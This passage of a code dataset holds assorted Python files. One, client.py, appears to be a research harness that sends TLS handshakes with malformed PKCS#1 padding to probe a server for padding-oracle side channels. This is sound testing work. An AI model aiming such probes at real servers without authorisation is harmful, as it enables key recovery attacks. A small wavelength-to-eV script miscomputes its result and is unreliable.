\"demoproject.demoapp.models.Sender2\"),\n ]\n\n # assert form.as_table() == u'<tr><th><label for=\"id_sender\">Sender:</label></th>' \\\n # u'<td><select id=\"id_sender\" name=\"sender\" required>\\n' \\\n # u'<option value=\"\">---------</option>\\n' \\\n # u'<option value=\"demoproject.demoapp.models.Sender1\" selected=\"selected\">demoproject.demoapp.models.Sender1</option>\\n' \\\n # u'<option value=\"demoproject.demoapp.models.Sender2\">demoproject.demoapp.models.Sender2</option>\\n</select></td></tr>'\n\n\n@pytest.mark.django_db\ndef test_admin_demomodel_add(webapp, admin_user):\n res = webapp.get(\"/demoapp/demomodel/add/\", user=admin_user)\n form = res.forms[\"demomodel_form\"]\n form[\"sender\"] = \"demoproject.demoapp.models.Sender1\"\n # import pdb; pdb.set_trace()\n\n form.submit().follow()\n assert (\n DemoModel.objects.filter(sender=\"demoproject.demoapp.models.Sender1\").count()\n == 1\n )\n\n\n@pytest.mark.django_db\ndef test_admin_demomodel_edit(webapp, admin_user, demomodel):\n url = reverse(\"admin:demoapp_demomodel_change\", args=[demomodel.pk])\n res = webapp.get(url, user=admin_user)\n form = res.forms[\"demomodel_form\"]\n form[\"sender\"] = \"demoproject.demoapp.models.Sender2\"\n form.submit().follow()\n assert (\n DemoModel.objects.filter(sender=\"demoproject.demoapp.models.Sender2\").count()\n == 1\n )\n\n\n@pytest.mark.django_db\ndef test_admin_demomodel_validate(webapp, admin_user, demomodel):\n url = reverse(\"admin:demoapp_demomodel_change\", args=[demomodel.pk])\n res = webapp.get(url, user=admin_user)\n form = res.forms[\"demomodel_form\"]\n form[\"sender\"].force_value(\"invalid_strategy_classname\")\n res = form.submit()\n assert \"Select a valid choice\" in res.context[\"adminform\"].form.errors[\"sender\"][0]\n\n\n@pytest.mark.django_db\ndef test_demomodel_lookup_equal(demomodel, target):\n assert DemoModel.objects.get(sender=target(demomodel)) == demomodel\n\n\n@pytest.mark.django_db\ndef test_demomodel_lookup_contains(demomodel, target):\n assert DemoModel.objects.get(sender__contains=target(demomodel)) == demomodel\n\n\n@pytest.mark.django_db\ndef test_demomodel_lookup_in(demomodel, target):\n assert 
DemoModel.objects.get(sender__in=target(demomodel)) == demomodel\n\n\n@pytest.mark.django_db\ndef test_display_attribute(demomodel, registry, monkeypatch):\n monkeypatch.setattr(\n SenderNotRegistered,\n \"label\",\n classmethod(lambda s: fqn(s).split(\".\")[-1]),\n raising=False,\n )\n # DemoModel._meta.get_field('sender').display_attribute = 'label'\n DemoModel._meta.get_field(\"sender\").registry = registry\n registry.register(SenderNotRegistered)\n assert registry.as_choices() == [\n (\"demoproject.demoapp.models.Sender1\", \"demoproject.demoapp.models.Sender1\"),\n (\"demoproject.demoapp.models.Sender2\", \"demoproject.demoapp.models.Sender2\"),\n (\"demoproject.demoapp.models.SenderNotRegistered\", \"SenderNotRegistered\"),\n ]\n\n form_class = modelform_factory(DemoModel, exclude=[])\n form = form_class(instance=demomodel)\n assert form.fields[\"sender\"].choices == [(\"\", \"---------\")] + registry.as_choices()\n\n assert form.fields[\"sender\"].choices[3][1] == \"SenderNotRegistered\"\n","repo_name":"saxix/django-strategy-field","sub_path":"tests/test_choice_as_class.py","file_name":"test_choice_as_class.py","file_ext":"py","file_size_in_byte":7124,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"48"}
+{"seq_id":"37585975133","text":"from pymyorm.database import Database\nfrom tests.config import db\nfrom tests.models.user import User\n\n\nif __name__ == '__main__':\n\n Database.connect(**db)\n\n total = User.find().where('brief', 'is', None).count()\n print(total)\n\n one = User.find().where(name='sean').one()\n one.name = None\n one.brief = '123'\n one.save()\n","repo_name":"oldjun/PyMyORM","sub_path":"tests/my_null.py","file_name":"my_null.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"}
+{"seq_id":"19051581922","text":"import tensorflow as tf\n\nx_train = [1, 2, 3] # [1]\ny_train = [1, 2, 3] # [2]\n\nx = tf.compat.v1.placeholder(tf.float32)\ny = tf.compat.v1.placeholder(tf.float32)\n\nw = tf.compat.v1.Variable([10], dtype= tf.float32, name = 'weight')\n\nhypothesis = x * w\n\nloss = tf.reduce_mean(tf.square(hypothesis - y)) # mse\n\n############### optimizer ###############\nlr = 0.1\n# gradient = tf.reduce_mean((w * x - y) * x) # don't write it this way\ngradient = tf.reduce_mean((x * w - y) * x) # expression for the gradient (derivative of the loss)\n# gradient = tf.reduce_mean((hypothesis - y) * x)\n\ndescent = w - lr * gradient\nupdate = w.assign(descent) # w = w - lr * gradient -> keep updating the weight with the gradient\n\n##################### optimizer #####################\nw_history = []\nloss_history = []\n\nsess = tf.compat.v1.Session()\nsess.run(tf.compat.v1.global_variables_initializer())\n\nfor step in range(21):\n _, loss_v, w_v = sess.run([update, loss, w], feed_dict = {x:x_train, y:y_train})\n print(step, '\\t', loss_v, '\\t', w_v)\n \n w_history.append(w_v)\n loss_history.append(loss_v)\n \nsess.close()\nprint('=============== w history ===============')\nprint(w_history)\nprint('=============== Loss history ===============')\nprint(loss_history)\n\n\n# Chain rule: the derivative of a composite is a product of derivatives\n# One of the rules of differentiation in calculus, used to differentiate composite functions\n# First differentiate the outer function (f), then the inner function (g),\n# and multiply the outer derivative (evaluated at the inner function) by the inner derivative\n# ex)\n# y = (2x+y)^2\n# 2*(2x+y)*2\n# =\n# 4x^2 + 4xy + y^2\n# 8x + 4y = 2*(2x+y)*2\n","repo_name":"seohee1205/study_aca","sub_path":"tf114/tf11_gradientDescent.py","file_name":"tf11_gradientDescent.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
+{"seq_id":"8199645648","text":"from django.utils.translation import gettext_lazy as _\r\nfrom django.shortcuts import get_object_or_404\r\n\r\nfrom rest_framework import views\r\nfrom rest_framework.response import Response\r\nfrom rest_framework.permissions import IsAuthenticated\r\n\r\nfrom decimal import Decimal\r\nfrom datetime import datetime\r\n\r\nfrom customed_files.date_convertor import MiladiToShamsi\r\nfrom customed_files.states_towns import list_states_towns\r\nfrom main.models import Product, ShopFilterItem\r\nfrom main.model_methods import update_product_stock\r\nfrom cart.views import CartCategoryView\r\nfrom cart.cart import Cart\r\nfrom payment.views import PaymentStart\r\nfrom .models import ProfileOrder, Order, OrderItem, Dispatch\r\nfrom .serializers import ProfileOrderSerializer, OrderSerializer, OrderItemSerializer\r\nfrom .methods import profile_order_detail\r\n\r\n\r\n\r\nclass ListCreateProfileOrder(views.APIView):\r\n permission_classes = [IsAuthenticated] #redirect to login page by front if user is not logged in.\r\n def get(self, request, *args, **kwargs): #here the ProfileOrders of a user are listed. come here from url /cart/. here the front side must create a form referencing ListCreateOrderItem, and when a checkbox is clicked, auto-submit to ProfileOrderDetail.get for obtaining the shipping price. \r\n profileorders = request.user.profileorders.select_related('town__state')\r\n total_prices = Cart(request).get_total_prices()\r\n if profileorders:\r\n return Response({'total_prices': str(total_prices), 'profileorders': ProfileOrderSerializer(profileorders, many=True).data})\r\n else:\r\n return Response({'total_prices': str(total_prices), 'profileorders': None}) #after this the front side must create a blank ProfileOrder form with its action referencing ListCreateProfileOrder.post. (you can create the form and its html elements with a django modelform and pass the html elements to the front) \r\n\r\n def post(self, request, *args, **kwargs): #here a ProfileOrder is created from the form data sent by the user.\r\n data = request.data #data sent must be like {\"first_name\": \"javad\", \"last_name\":\"haghi\", \"phone\":\"09127761277\", \"town\":\"1\", \"address\":\"tehran\", \"postal_code\":\"1111111111\"} to save the ProfileOrder object successfully.\r\n main_profileorder = ProfileOrder.objects.filter(user=request.user, main=True)\r\n data['main'] = True if not main_profileorder else False #the first profileorder must be the main profileorder.\r\n data['user'] = request.user.id\r\n serializer = ProfileOrderSerializer(data=data)\r\n if serializer.is_valid():\r\n profileorder = serializer.save()\r\n # get = request.GET.copy()\r\n # get.setlist('profileorder_id', str(profileorder.id))\r\n # request.GET = get\r\n return Response(ProfileOrderSerializer(profileorder).data) #why not use OrderSerializer(order).data? answer: the user may create a second order, so we always need user.orders.all() .\r\n else:\r\n return Response(serializer.errors)\r\n\r\n\r\n\r\n\r\nclass ProfileOrderDetail(views.APIView):\r\n permission_classes = [IsAuthenticated]\r\n def get(self, request, *args, **kwargs): # here the shipping price is computed and sent to the front. 
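For the gradient-descent record above: the hand-coded `gradient` drops the constant factor 2 from the true MSE derivative, which only rescales the learning rate. Written out (a short worked derivation matching the code's `reduce_mean`):

```latex
L(w) = \frac{1}{n}\sum_{i=1}^{n} (x_i w - y_i)^2
\qquad\Longrightarrow\qquad
\frac{\partial L}{\partial w} = \frac{2}{n}\sum_{i=1}^{n} (x_i w - y_i)\, x_i
```

So `tf.reduce_mean((x * w - y) * x)` is exactly half of the derivative, and the update `w <- w - lr * gradient` behaves like true gradient descent with an effective learning rate of `2 * lr`.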
(depending on which profileorder is chosen)\r\n        dic = profile_order_detail(request, kwargs['pk'])          # profile_order_detail sets the cart vars personal_shipping_price and post_shipping_price\r\n        if not dic:\r\n            return Response(_('your cart is empty, add a product to order.'))\r\n        return Response(dic)     # what is profileorder_selected for? answer: so the front end knows which checkbox should be selected after profileorder creation (after coming from ListCreateProfileOrder.post to .get)\r\n    \r\n    def put(self, request, *args, **kwargs):          #here the ProfileOrder is updated.\r\n        profileorder = ProfileOrder.objects.get(id=kwargs.get('pk'))\r\n        serializer = ProfileOrderSerializer(instance=profileorder, data=request.data, partial=True)\r\n        if serializer.is_valid():\r\n            profileorder = serializer.save() \r\n            return Response(ProfileOrderSerializer(profileorder).data)\r\n        else:\r\n            return Response(serializer.errors)\r\n\r\n    def delete(self, request, *args, **kwargs):        #here the ProfileOrder is deleted.\r\n        profileorder = ProfileOrder.objects.get(id=kwargs.get('pk'))\r\n        profileorder.visible = False\r\n        profileorder.save()\r\n        return Response('deleted successfully')\r\n\r\n\r\n\r\n\r\nclass ListCreateOrderItem(views.APIView): \r\n    permission_classes = [IsAuthenticated]\r\n    def get(self, request, *args, **kwargs):        #here the ordered products are listed for display in the user profile.\r\n        orders = Order.objects.filter(profile_order__user=request.user).select_related('profile_order').prefetch_related('items__product__image_icon', 'items__product__rating').order_by('-created')#OrderItem.objects.filter(order__profile_order__user=request.user, order__paid=True).select_related('order__profile_order').order_by('-order__created')\r\n        return Response({'orders': OrderSerializer(orders, many=True, context={'request': request}).data})\r\n    \r\n    def post(self, request, *args, **kwargs):      #here the orderitems are created. 
reached from class ProfileOrderDetail.get (cart.session['shipping_price'] is initialized in that class); connect here with the url: http http://192.168.114.21:8000/orders/orderitems/ cookie:\"sessionid=...\" profile_order_id=1 paid_type=cod shipping_type=personal_dispatch or post\r\n        cart, data, total_prices, price_changed, quantity_ended = Cart(request), request.data, Decimal(0), False, False\r\n        paid_type, shipping_type = data.get('paid_type', 'online'), data.get('shipping_type')     #important: if the website has both cod and online payment, the front end should create 2 checkboxes for them.\r\n        orderitems, products, shopfilteritems, lists = [], [], [], []\r\n        for item in cart:\r\n            price_changed = True if item['price_changes'] != Decimal('0') else price_changed\r\n            quantity_ended = True if item['shopfilteritem'] and item['quantity'] > item['shopfilteritem'].stock else True if item['quantity'] > item['product'].stock else quantity_ended     #if item['shopfilteritem'] is truthy but item['quantity'] > item['shopfilteritem'].stock is false, and item['quantity'] > item['product'].stock happens to be true, this would wrongly set quantity_ended to true; that cannot happen here because item['product'].stock >= item['shopfilteritem'].stock always holds (because of ShopFilterItem.save.update_product_stock) \r\n            total_prices += item['total_price']\r\n            lists.append([item['shopfilteritem'], item['product'], item['quantity']]) if item['shopfilteritem'] else lists.append([item['product'], item['quantity']]) \r\n            orderitems.append(OrderItem(shopfilteritem=item['shopfilteritem'], price=item['total_price'], quantity=item['quantity'])) if item['shopfilteritem'] else orderitems.append(OrderItem(product=item['product'], price=item['total_price'], quantity=item['quantity']))     #this line is saved here only for cod (for online payment it is saved after the payment)\r\n        \r\n        if not price_changed and not quantity_ended and paid_type in ['cod', 'online'] and shipping_type in ['personal_dispatch', 'post']:\r\n            shipping_price = Decimal(cart.session['personal_shipping_price']) if shipping_type == 'personal_dispatch' else Decimal(cart.session['post_shipping_price'])\r\n            total_prices += shipping_price\r\n            order = Order.objects.create(profile_order_id=data['profile_order_id'], paid_type=paid_type, paid=False, price=total_prices, shipping_price=shipping_price, shipping_type=shipping_type, order_status='0')\r\n            for orderitem in orderitems:\r\n                orderitem.order = order\r\n            if paid_type == 'cod':\r\n                for L in lists:\r\n                    if isinstance(L[0], ShopFilterItem):\r\n                        L[0].stock -= L[2]          #important: .update is a completely separate method from .save and does not run .save, so we need to update available too. 
reference: https://stackoverflow.com/questions/33809060/django-update-doesnt-call-override-save\r\n                        L[0].available = False if L[0].stock < 1 else True\r\n                        product = update_product_stock(L[0], L[1], saving=False)\r\n                        L[0].previous_stock = L[0].stock\r\n                        shopfilteritems.append(L[0]), products.append(L[1])\r\n                    else:\r\n                        L[0].stock -= L[1]\r\n                        L[0].available = False if L[0].stock < 1 else True\r\n                        products.append(L[0])\r\n                OrderItem.objects.bulk_create(orderitems)        #bulk_create creates several objects with at most 3 connections to the db.\r\n                Product.objects.bulk_update(products, ['stock', 'available'])\r\n                ShopFilterItem.objects.bulk_update(shopfilteritems, ['stock', 'available'])     #if shopfilteritems is blank it is not a problem.\r\n                cart.clear()\r\n                return Response({'orderitems created successfully'})\r\n\r\n            else:\r\n                orderitem_ids = []\r\n                for orderitem in orderitems:       #note: OrderItem.objects.bulk_create does not return the created instances, and there is no workaround (maybe fixed in a later version)\r\n                    orderitem.save()\r\n                    orderitem_ids.append(orderitem.id)\r\n                Product.objects.bulk_update(products, ['stock', 'available'])\r\n                ShopFilterItem.objects.bulk_update(shopfilteritems, ['stock', 'available'])     #if shopfilteritems is blank it is not a problem.\r\n                cart.session['order_id'] = order.id\r\n                cart.session['orderitem_ids'] = orderitem_ids\r\n                cart.save()\r\n                return PaymentStart().post(request, total_prices)\r\n        \r\n        elif price_changed or quantity_ended:\r\n            return Response({'price_changed': price_changed, 'quantity_ended': quantity_ended, **CartCategoryView().get(request, datas_selector='products_user_csrf').data})      #the front end redirects to the cart page.\r\n        else:\r\n            return Response({})\r\n\r\n\r\n\r\n","repo_name":"ahmadekhalili/eCommerce-web-api","sub_path":"ictsun/orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10666,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"24871921324","text":"####################################\n#\n# Databases project - UI.Menus Package\n#\n####\n#\n# Written by:\tOz Tamir\n# Email:\t\tTheOzTamir@gmail.com\n# Date:\t\t\t20 - 02 - 2015\n#\n####\n#\n# Filename:\t\tadd_menu.py\n# Description:\tThis file defines a menu that adds items\n#\n####################################\nfrom menu_base import MenuBase\n\nclass AddMenu(MenuBase):\n\t''' Class for a menu that adds items '''\n\tdef __init__(self, config, ui_manager):\n\t\toptions = [\n\t\t\t('Add a new product', ui_manager.new_product),\n\t\t\t('Create a new purchase', ui_manager.new_purchase),\n\t\t\t('Create a new order', ui_manager.new_order),\n\t\t\t('Add a new category', ui_manager.new_category)\n\t\t]\n\t\tsuper(AddMenu, self).__init__(options, config)","repo_name":"OzTamir/Databases-Project","sub_path":"ui/Menus/add_menu.py","file_name":"add_menu.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"43663373697","text":"# Task. Collect information about vacancies for the entered job title (the job title comes from input or from\n# command-line arguments) from the HH site. The application must analyze all pages of the site. The resulting list must\n# contain at least:\n# The vacancy name.\n# The offered salary (split into three fields: minimum, maximum and currency; 
the numbers are converted to numeric values).\n# A link to the vacancy itself.\n# The site the vacancy was collected from.\n# Optionally, more vacancy parameters can be added (for example, the employer and location). The overall result can\n# be displayed as a DataFrame via pandas. Save it to json or csv.\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport json\n\n# post = input('Enter the job title: ')\npost = 'sadovnik'\n\nbase_url = 'https://hh.ru'\n\nheaders = {\n    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 '\n                  'Safari/537.36'\n}\n\nparams = {'page': 0}\n\nurl = f'{base_url}/vacancies/{post}'\n\nsession = requests.Session()\n\nvacancies_list = []\n\nwhile True:\n\n    response = session.get(url, headers=headers, params=params)\n\n    dom = BeautifulSoup(response.text, 'html.parser')\n\n    vacancies = dom.find_all('div', {'class': 'serp-item'})\n\n    for vacancy in vacancies:\n        vacancy_data = {}\n\n        info = vacancy.find('a', {'class': 'serp-item__title'})\n        link = info['href']\n        name = info.getText()\n\n        company = vacancy.find('div', {'class': 'vacancy-serp-item__meta-info-company'})\n        company_name = company.getText()\n        try:\n            company_link = base_url + company.next.attrs['href']\n        except AttributeError:\n            company_link = None\n\n        city = vacancy.find('div', {'data-qa': 'vacancy-serp__vacancy-address'}).getText()\n        experience = vacancy.find('div', {'data-qa': 'vacancy-serp__vacancy-work-experience'}).getText()\n\n        salary = vacancy.find('span', {'data-qa': 'vacancy-serp__vacancy-compensation'})\n\n        salary_max = None\n        salary_min = None\n        salary_currency = None\n\n        if salary:\n            salary = salary.text\n            salary_list = salary.replace('\\u202f', '').split()\n            salary_currency = salary_list[-1]\n            if salary_list[0] == 'от':\n                salary_min = int(salary_list[1])\n            elif salary_list[0] == 'до':\n                salary_max = int(salary_list[1])\n            elif salary_list[1] == '–':\n                salary_min = int(salary_list[0])\n                salary_max = int(salary_list[2])\n            else:\n                print(f'Check salary in page={params[\"page\"]} name={name} company={company}')\n\n        vacancy_data['vacancy_link'] = link\n        vacancy_data['name'] = name\n        vacancy_data['salary_min'] = salary_min\n        vacancy_data['salary_max'] = salary_max\n        vacancy_data['salary_currency'] = salary_currency\n        vacancy_data['company'] = company_name\n        vacancy_data['company_link'] = company_link\n        vacancy_data['city'] = city\n        vacancy_data['experience'] = experience\n        vacancy_data['site'] = base_url\n\n        vacancies_list.append(vacancy_data)\n\n    if dom.find_all('a', {'data-qa': 'pager-next'}):\n        params['page'] += 1\n    else:\n        break\n\nwith open('Homework_2_output.json', 'w') as write_file:\n    json.dump(vacancies_list, write_file)\n\nprint(len(vacancies_list))\n","repo_name":"AnnaLosevaGB/GB_internet_search","sub_path":"Homework_2.py","file_name":"Homework_2.py","file_ext":"py","file_size_in_byte":3920,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2179210593","text":"import streamlit as st\nimport streamlit.components.v1 as components\nimport os\n\nTitle_html = \"\"\"\n    <style>\n        h3{\n        font-size: 26px;\n        color: #2E2E2E;\n        text-align: center;\n        font-style: oblique;\n        font-weight: bold;\n        width: 100%;\n        }\n\n    </style> \"\"\"\n\nst.set_page_config(layout=\"wide\")\n\nscript_dir = os.path.dirname(__file__)\n\n# st.markdown(\"<h1 style='text-align: center;'>Topic Modelling</h1>\", unsafe_allow_html=True)\n\n\nrel_path = '../static/graficos/dilma_topic_overtime.html'\nabs_file_path = os.path.join(script_dir, 
rel_path)\n\nHtmlFile = open(abs_file_path, 'r', encoding='utf-8')\nsource_code = HtmlFile.read()\ncomponents.html(source_code, height=400, width=1250)\nst.markdown(\"<h3>Debates organized by TV channels is the main dominant topic in the final stage of election campaign </h3>\", unsafe_allow_html=True)\n\nrel_path = '../static/graficos/dilma_TopicDistance.html'\nabs_file_path = os.path.join(script_dir, rel_path)\n\nHtmlFile = open(abs_file_path, 'r', encoding='utf-8')\nsource_code = HtmlFile.read()\ncomponents.html(source_code, height=500, width=1250)\n\nst.markdown(\"<h3>Governmental social schemes like Bolsa Familia, the world cup and the results of polling institutions \\\n are the main topics discussed during the election campaign </h3>\", unsafe_allow_html=True)\n\n\nrel_path = '../static/graficos/dilma_hierarchicalCluster.html'\nabs_file_path = os.path.join(script_dir, rel_path)\n\nHtmlFile = open(abs_file_path, 'r', encoding='utf-8')\nsource_code = HtmlFile.read()\ncomponents.html(source_code, height=500, width=1250)\n","repo_name":"waguii/twitterelectionbr","sub_path":"twitterelectionbr/interface/frontend/pages/1_Topic_Model.py","file_name":"1_Topic_Model.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"31566023992","text":"import cv2\r\n\r\n# Load pre-trained face detection model\r\nface_cascade = cv2.CascadeClassifier('D:/programming/MyRepo/ChatGPT class/haarcascade_frontalface_default.xml')\r\n\r\n# Read image from file\r\nimage = cv2.imread('D:/programming/MyRepo/ChatGPT class/Image.jpg')\r\n\r\n# Resized_image\r\nresized_img = cv2.resize(image, (400, 600))\r\n\r\n# Convert image to grayscale\r\ngray = cv2.cvtColor(resized_img, cv2.COLOR_BGR2GRAY)\r\n\r\n# Detect faces in the image\r\nfaces = face_cascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=5)\r\n\r\n# Draw rectangles around the detected faces\r\nfor (x, y, w, h) in faces:\r\n cv2.rectangle(resized_img, (x, y), (x+w, y+h), (0, 255, 0), 2)\r\n\r\n# Display the image with the detected faces\r\n#cv2.imshow('Image', resized_img)\r\n\r\n# Wait for a key press and then close the window\r\ncv2.imshow('img', resized_img)\r\ncv2.waitKey()\r\n","repo_name":"sheinah/ChatGPT-with-Python","sub_path":"face detection.py","file_name":"face detection.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"8177695248","text":"import multiprocessing\nfrom os import cpu_count\nimport random\nimport subprocess\nimport time\nfrom random import choice\n\nimport pandas\n\nimport argparse\n\n\ndef determine_client_hello_random(log: str) -> str:\n for line in log.splitlines():\n if 'ClientHello.random=' in line:\n return line.split('=')[-1].replace(' ', ':').rstrip(':')\n raise AssertionError('There was no Client Hello randomness in the log of a client, aborting')\n\n\ndef run_single_session(request_index: int, sut_name: str, use_sentinel: bool, wait_time: float, enable_skip_ccs_fin: bool, enable_noskip_ccs_fin: bool, twoclass: bool, oneclass: bool) -> (str, str, bool):\n config_files = ['./tls_test_tool_client/config/base.conf',\n f'./tls_test_tool_client/config/{sut_name}.conf']\n if enable_skip_ccs_fin:\n if enable_noskip_ccs_fin:\n # Coin flip\n skip_ccs_fin = bool(random.randint(0, 1))\n else:\n skip_ccs_fin = True\n else:\n if enable_noskip_ccs_fin:\n skip_ccs_fin = False\n else:\n print('At least one of --skip or --noskip must 
be selected')\n skip_ccs_fin = False\n exit(1)\n\n if oneclass:\n test_cases = ['Wrong_first_byte_(0x00_set_to_0x17)']\n elif twoclass:\n test_cases = ['Correctly_formatted_PKCS#1_PMS_message',\n 'Invalid_TLS_version_in_PMS']\n else:\n test_cases = ['Correctly_formatted_PKCS#1_PMS_message',\n 'Wrong_separator_(0x00_set_to_0x17)',\n 'Invalid_TLS_version_in_PMS',\n 'Wrong_first_byte_(0x00_set_to_0x17)',\n 'Wrong_second_byte_(0x02_set_to_0x17)',\n 'Wrong_separator_position_(44)']\n\n current_case = choice(test_cases)\n config_files.append(f'./tls_test_tool_client/config/{current_case}.conf')\n if skip_ccs_fin:\n config_files.append('./tls_test_tool_client/config/skip_change_cipher_spec_and_finished.conf')\n if use_sentinel:\n call_array = ['./tls_test_tool_client/TlsTestToolSentinel']\n else:\n call_array = ['./tls_test_tool_client/TlsTestTool']\n print(f'Starting client {request_index} with test case {current_case}{\", skipping CCS&FIN\" if skip_ccs_fin else \"\"}')\n call_array.extend([f'--configFile={config_file}' for config_file in config_files])\n\n # Start the tls test tool using popen, save log output to string\n try:\n pipes = subprocess.Popen(call_array, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n std_out, std_err = pipes.communicate()\n std_out = std_out.decode('utf-8')\n std_err = std_err.decode('utf-8')\n if pipes.returncode != 0:\n print(std_out)\n print(f'Return code: {pipes.returncode}')\n if len(std_err):\n print(f'Stderr: {std_err}')\n except OSError as error:\n print(f'OSError {error}')\n std_out = b''\n\n client_hello_random = determine_client_hello_random(std_out)\n time.sleep(wait_time * 0.001)\n return client_hello_random, current_case, skip_ccs_fin\n\n\ndef run_multiple_clients(repetitions: int, sut_name: str, use_sentinel: bool, wait_time: float, skip: bool, noskip: bool, parallelization_factor: int, twoclass: bool, oneclass: bool):\n request_arguments = [[index, sut_name, use_sentinel, wait_time, skip, noskip, twoclass, oneclass] for index in range(repetitions)]\n with multiprocessing.Pool(processes=parallelization_factor) as pool:\n results = pool.starmap(run_single_session, request_arguments)\n results_dataframe = pandas.DataFrame(results, columns=['client_hello_random', 'label', 'skipped_ccs_fin'])\n return results_dataframe\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-f', '--folder', required=True,\n help='Folder that contains the input files Packets.pcap and Client Requests.csv '\n 'and that the output files will be written to')\nparser.add_argument('-r', '--repetitions', type=int, required=True,\n help='Number of handshakes to execute')\nparser.add_argument('-s', '--sentinel', action='store_true',\n help='Use the sentinel-protected, unrestricted version of the TLS test tool')\nparser.add_argument('-n', '--name', required=True,\n help='Name of the system under test, used to load the matching IP&port configuration')\nparser.add_argument('-w', '--wait', type=int, default=0,\n help='Wait time in milliseconds after each request before starting the next request')\nparser.add_argument('--skip', action='store_true', default=False,\n help='Make some request where the client omits ChangeCipherSpec and Finished')\nparser.add_argument('--noskip', action='store_true', default=False,\n help='Make some request where the client properly sends ChangeCipherSpec and Finished')\nparser.add_argument('--processes', type=int, default=1,\n help='Parallelization factor, how many processes to use concurrently')\nparser.add_argument('--twoclass', 
action='store_true', default=False,\n                    help='Only choose between correct padding and wrong version number manipulations')\nparser.add_argument('--oneclass', action='store_true', default=False,\n                    help='Instead of randomly choosing between all manipulations, choose only wrong first byte')\nargs = parser.parse_args()\nrequest_results = run_multiple_clients(args.repetitions, args.name, args.sentinel, args.wait, args.skip, args.noskip, args.processes, args.twoclass, args.oneclass)\nrequest_results.to_csv(f'{args.folder}/Client Requests.csv')\nrequest_results.to_excel(f'{args.folder}/Client Requests.xlsx')\n","repo_name":"ITSC-Group/autosca-tool","sub_path":"tls_test_tool_client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":5736,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"36033422804","text":"import math\nfrom typing import Any, Union\n\ndef calconde():\n    while True:\n        # variable used to validate the value entered by the user\n        l = input(\"What is the wavelength to convert to electronvolts? \")\n        try:\n            l = int(l)\n            if l < 0:\n                print(\"Error, value below zero.\", end=\" \")\n                continue\n            else:\n                break\n        except ValueError:\n            print(\"Invalid input. Try again\")\n            continue\n    c = 3 * 10 ** 8\n    a = l * 10 ** -9\n    v = c / l\n    h = 6.63 * 10 ** -34\n    j = v * h\n    ev = 1.6 * 10 ** -19\n    t = j/ev\n    r = round(t*10**9, 2)\n    print(\"The result is:\",r,\"eV\")\n\ncalconde()\n\ninput(\"Press ENTER to continue\")","repo_name":"NewRedsquare/Python-ICN","sub_path":"calcul_onde.py","file_name":"calcul_onde.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"418385011","text":"import keras\nimport random\nimport numpy as np\nfrom PIL import Image\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.callbacks import ModelCheckpoint\nfrom keras import backend as K\nimport pickle\n\nimport lutorpy as lua\n\nrequire(\"torch\")\n\nbatch_size = 16\nnum_classes = 20\nepochs = 1000\n\ntotal_features = []\n\n# input image dimensions\nimg_rows, img_cols = 128, 256\n\ntrain_data = []\ntrain_labels = []\n\nfile_names = []\nclass_ids = []\n\nfilelist = open('filelist.txt', 'r')\n\nfor file in filelist.readlines():\n    fname, classid = file.split(' ')\n    file_names.append(fname)\n    classid = int(classid) - 1 # Make them zero indexed\n    class_ids.append(classid+1)\n    imgfile = Image.open(fname)\n    img = imgfile.resize((img_rows, img_cols), Image.ANTIALIAS) \n    img = np.asarray(img)\n    train_data.append(img)\n    train_labels.append(classid)\n    \ntrain_data = np.array(train_data)\ntrain_labels = np.array(train_labels)\n\n#print train_data.shape, train_labels.shape\n\nif K.image_data_format() == 'channels_first':\n    train_data = train_data.reshape(train_data.shape[0], 3, img_rows, img_cols)\n    input_shape = (3, img_rows, img_cols)\nelse:\n    train_data = train_data.reshape(train_data.shape[0], img_rows, img_cols, 3)\n    input_shape = (img_rows, img_cols, 3)\n\ntrain_data = train_data.astype('float32')\ntrain_data /= 255\nprint('train_data shape:', train_data.shape)\nprint(train_data.shape[0], 'train samples')\n\n# convert class vectors to binary class matrices\ntrain_labels = keras.utils.to_categorical(train_labels, num_classes)\n\nmodel = Sequential()\nmodel.add(Conv2D(64, kernel_size=(5, 5),\n                 activation='relu',\n                 
